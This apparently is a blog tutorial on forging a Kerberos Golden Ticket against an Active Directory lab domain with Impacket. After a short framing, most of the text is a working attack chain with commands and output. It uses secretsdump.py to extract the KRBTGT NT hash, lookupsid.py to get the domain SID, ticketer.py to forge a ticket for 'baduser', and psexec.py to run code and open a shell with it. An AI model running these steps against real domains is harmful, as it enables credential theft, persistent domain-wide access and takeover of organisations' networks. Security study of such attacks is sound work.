In a Golden Ticket attack, an attacker creates a fake "ticket" that allows them to access the network as if they were a legitimate user. This ticket is called a "Golden Ticket" because it gives the attacker unlimited access to the network.

The Golden Ticket attack is a serious threat because it allows an attacker to gain unauthorized access to a network and potentially steal sensitive information or cause other damage. It is important for individuals and organizations to take steps to protect against this type of attack, such as using strong passwords and enabling two-factor authentication.

I wanted to know how to create a Golden Ticket and in my pursuit to find an answer I came across many ways to do this. I found most techniques used several tools and took more work than I'd prefer. After all I am a developer for a reason, I'm lazy! Here I will attempt to show how I do it the easy way using Impacket.

Prerequisite

• Impacket
• Windows Active Directory Domain Controler

This attack takes advantage of some of the features in Active Directory. This being said an Active Directory Domain Controler is needed for this to work.

Impacket

Creating a Golden Ticket is made simple with the help of Impacket. Impacket is a suite of tools that any hacker should familiarize herself/himself with. The easiest way to get started with Impacket is to create a docker image. For more information on that check out my blog post impacket and docker.

For creating a Golden Ticket we are only concerned with the following tools.

• secretsdump.py
• lookupsid.py
• ticketer.py
• psexec.py

Create a Golden Ticket

To create a Golden Ticket the NT Hash for KRBTGT will need to be aquired as well as the Domain SID.
All this can easily be done with Impacket.

KRBTGT NT Hash

Lets start off by getting the KRBTGT hash. The following script will write our desired information to
a file called win2016 in the ~/ directory.

secretsdump.py Administrator:vagrant@192.168.64.133 | grep krbtgt | grep ::: > ~/win2016; cat ~/win2016

Domain SID

To get the domain SID use lookupsid.py and grep to filter out just the information needed.
Again that information is writen to the win2016 file.

lookupsid.py Administrator:vagrant@192.168.64.133 | grep "Domain SID" >> ~/win2016; cat ~/win2016

Domain Name

There are times when we forget which domain we are on. To limit errors we will not assume the domain name but rather
get it from the machine.

echo "powershell Get-WmiObject Win32_ComputerSystem" > ~/GetDomain.bat

Now execute this bat file on the target.

psexec.py Administrator:vagrant@192.168.64.133 -c ~/GetDomain.bat | grep Domain >> ~/win2016; cat ~/win2016

Create Ticket

With all the nessassary data create a ticket.

ticketer.py -nthash 4031b5ae4b9defa1f411f26610493e0c -domain-sid S-1-5-21-126282473-2140987555-3925513934 -domain Win2016.local baduser

Impacket v0.9.17-dev - Copyright 2002-2018 Core Security Technologies

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for Win2016.local/baduser
[*]         PAC_LOGON_INFO
[*]         PAC_CLIENT_INFO_TYPE
[*]         EncTicketPart
[*]         EncAsRepPart
[*] Signing/Encrypting final ticket
[*]         PAC_SERVER_CHECKSUM
[*]         PAC_PRIVSVR_CHECKSUM
[*]         EncTicketPart
[*]         EncASRepPart
[*] Saving ticket in baduser.ccache

Use the Ticket

To use the ticket with psexec.py the ticket needs to be exported.

Export the Ticket

The ticket will need to be exported to be able to use it with psexec.py.

echo "export KRB5CCNAME=/vagrant/docs/baduser.ccache" >> ~/.bashrc
. ~/.bashrc
tail ~/.bashrc

Use the Ticket With Psexec

Below we use the ticket against Win2016.

export KRB5CCNAME=/vagrant/docs/baduser.ccache; psexec.py -dc-ip 192.168.64.133 -target-ip 192.168.64.133 -no-pass -k Win2016.local/baduser@Win2016.Win2016.local